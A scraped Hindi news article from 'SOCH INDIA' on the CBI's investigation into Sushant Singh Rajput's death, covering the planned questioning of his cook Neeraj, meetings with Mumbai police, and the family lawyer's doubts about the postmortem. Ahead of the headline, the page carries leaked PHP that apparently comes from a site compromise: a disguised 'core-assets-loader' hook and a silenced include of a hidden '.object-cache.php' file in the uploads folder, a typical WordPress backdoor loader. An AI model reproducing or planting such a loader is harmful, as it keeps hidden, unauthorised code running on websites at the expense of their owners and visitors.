add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); मुंबई में CBI टीम करेगी सुशांत के कुक से पूछताछ, फॉरेंसिक टीम जुटाएगी सबूत – SOCH INDIA
Menu

देश
मुंबई में CBI टीम करेगी सुशांत के कुक से पूछताछ, फॉरेंसिक टीम जुटाएगी सबूत

nobanner

सुशांत सिंह राजपूत केस में सुप्रीम कोर्ट से हरी झंडी मिलने के बाद सीबीआई ने अपनी जांच शुरू कर दी है. CBI की 3 टीम केस की जांच में जुटी है. शुक्रवार से फुल एक्शन में होगी सीबीआई की जांच टीम. सीबीआई की 16 सदस्यों की आज से मामले की जांच शुरू करेगी. ईडी के बाद रिया पर सीबीआई का भी शिकंजा कस सकता है. वे इस केस की प्रमुख आरोपी हैं. सीबीआई की टीम कभी भी रिया को समन भेज सकती है.
सुशांत के कुक से पूछताछ

सुशांत केस की जांच सीबीआई ने तेज कर दी है. सीबीआई सुशांत के कुक नीरज से पूछताछ करेगी. नीरज वहीं हैं जिन्होंने बताया था कि उन्होंने सुशांत को सुसाइड वाले दिन जूस दिया था. नीरज ने ही सुशांत के दरवाजा ना खोलने की बात कही थी. नीरज से बिहार और मुबंई दोनों पुलिस ने पूछताछ की थी. वहीं DRDO गेस्ट हाउस में सीबीआई की टीम पूछताछ और बयान दर्ज करेगी.

बांद्रा के डीसीपी से मिलेगी सीबीआई की SIT टीम

सीबीआई की टीम आज मुंबई पुलिस के टॉप अफसरों से मिलेगी जिन्होंने सुशांत का केस हैंडल किया था. एजेंसी अब तक केस में की गई सभी जानकारी, फॉरेंसिक सबूत, पोस्टमार्टम रिपोर्ट, दर्ज किए गए बयानों का हैंडओवर लेगी. सुप्रीम कोर्ट के आदेशानुसार सीबीआई चाहेगी कि मुंबई पुलिस उन्हें जांच में मदद करे. केस की जांच कर रहे सीबीआई SIT टीम के सुपरिटेंडेंट रैंक के अधिकारी बांद्रा के डीसीपी अभिषेक त्रिमुखे से मिलेंगे. प्रोटोकॉल के तहत जांच को लेकर बात होनी है. इसके बाद बाकी की प्रक्रिया होगी. सुशांत के फ्लैट में जाएगी सीबीआई की टीम. टीम क्राइम सीन का रीक्रिएशन भी करेगी.
सुशांत के वकील ने पोस्टमार्टम रिपोर्ट पर उठाए सवाल

वहीं सुशांत के पिता के वकील विकास सिंह ने पोस्टमार्टम रिपोर्ट पर सवाल उठाए हैं. उन्होंने कहा- इस मामले में कवर अप के एक्सपोज होने की बहुत बड़ी संभावना है. डॉक्टर गुप्ता इस केस को बड़े ही प्रोफेशनल तरीके से देखेंगे. सुप्रीम कोर्ट ने इस केस में किसी भी अस्पष्टता का कोई मौका नहीं छोड़ा है. मुंबई पुलिस सीबीआई जांच में बाधा डालने के बारे में सोच भी नहीं सकती है.

उन्होंने कहा- पोस्टमार्टम रिपोर्ट में तमाम बातों का जिक्र नहीं. मौत से पहले सुशांत के जूस लेने की बात कही गई थी. रिपोर्ट में जूस का जिक्र नहीं है. पोस्टमार्टम में मौत का समय नहीं लिखा. इस केस में फॉरेंसिक का बहुत अहम रोल है. इस मामले की ठीक से तहकीकात की जरूरत है. पोस्टमार्टम रिपोर्ट विस्तार से क्यों नहीं दी गई, सुशांत के चेहरे पर निशान का रिपोर्ट में कोई जिक्र नहीं. सही से जांच हो तो बहुत ही बातें सामने आ सकती हैं.